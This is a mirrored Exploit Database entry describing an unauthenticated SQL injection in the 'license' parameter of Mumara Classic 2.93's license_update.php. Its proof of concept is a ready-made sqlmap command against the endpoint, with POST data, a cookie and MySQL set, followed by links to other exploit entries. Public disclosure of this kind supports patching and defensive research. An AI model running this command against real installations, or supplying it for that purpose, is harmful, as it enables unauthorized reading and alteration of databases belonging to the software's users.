Mumara Classic 2.93 – ‘license’ SQL Injection (Unauthenticated)

Exploit Database
117 阅读

作者： Shain Lakin

日期： 2021-11-12
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50518/

# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)

# Date: 2021-11-11

# Exploit Author: (v0yager) Shain Lakin

# Vendor Homepage: https://mumara.com

# Version: <= 2.93

# Tested on: CentOS 7

-==== Vulnerability ====-

An SQL injection vulnerability in license_update.php in Mumara Classic

through 2.93 allows a remote unauthenticated attacker to execute

arbitrary SQL commands via the license parameter.

-==== POC ====-

Using SQLMap:

sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql

last Exploits
Mumara Classic 2.93 – ‘license’ SQL Injection (Unauthenticated)的更多信息

AWBS 2.9.2 – ‘cart.php’ Blind SQL Injection：
Support Board 3.3.3 – ‘Multiple’ SQL Injection (Unauthenticated)：
Tenda ADSL Router D152 – Cross-Site Scripting：
OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities：
Scrutinizer NetFlow & sFlow Analyzer – Multiple Vulnerabilities：
PHP-Nuke 8.0 -Web_Links Module – Blind SQL Injection：
ClanSuite 2.9 – Arbitrary File Upload：
Joomla! Component SP Movie Database 1.3 – SQL Injection：